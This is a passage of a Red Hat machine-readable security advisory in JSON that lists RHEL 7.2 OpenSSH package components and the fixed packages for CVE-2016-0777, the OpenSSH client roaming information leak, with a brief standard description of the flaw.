"openssh-keycat-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64" }, "product_reference": "openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "relates_to_product_reference": "7Workstation-optional-7.2.Z" }, { "category": "default_component_of", "full_product_name": { "name": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64 as a component of Red Hat Enterprise Linux Workstation Optional (v. 7)", "product_id": "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" }, "product_reference": "pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "relates_to_product_reference": "7Workstation-optional-7.2.Z" } ] }, "vulnerabilities": [ { "acknowledgments": [ { "names": [ "Qualys" ] } ], "cve": "CVE-2016-0777", "cwe": { "id": "CWE-682", "name": "Incorrect Calculation" }, "discovery_date": "2016-01-13T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1298032" } ], "notes": [ { "category": "description", "text": "An information leak flaw was found in the way the OpenSSH client roaming feature was implemented. A malicious server could potentially use this flaw to leak portions of memory (possibly including private SSH keys) of a successfully authenticated OpenSSH client.", "title": "Vulnerability description" }, { "category": "summary", "text": "OpenSSH: Client Information leak due to use of roaming connection feature", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue does not affect the version OpenSSH as shipped with Red Hat Enterprise Linux 4, 5 and 6. This issue affects the version of OpenSSH as shipped with Red Hat Enterprise Linux 7 in a non-default configuration. For more information please refer to https://access.redhat.com/articles/2123781", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", 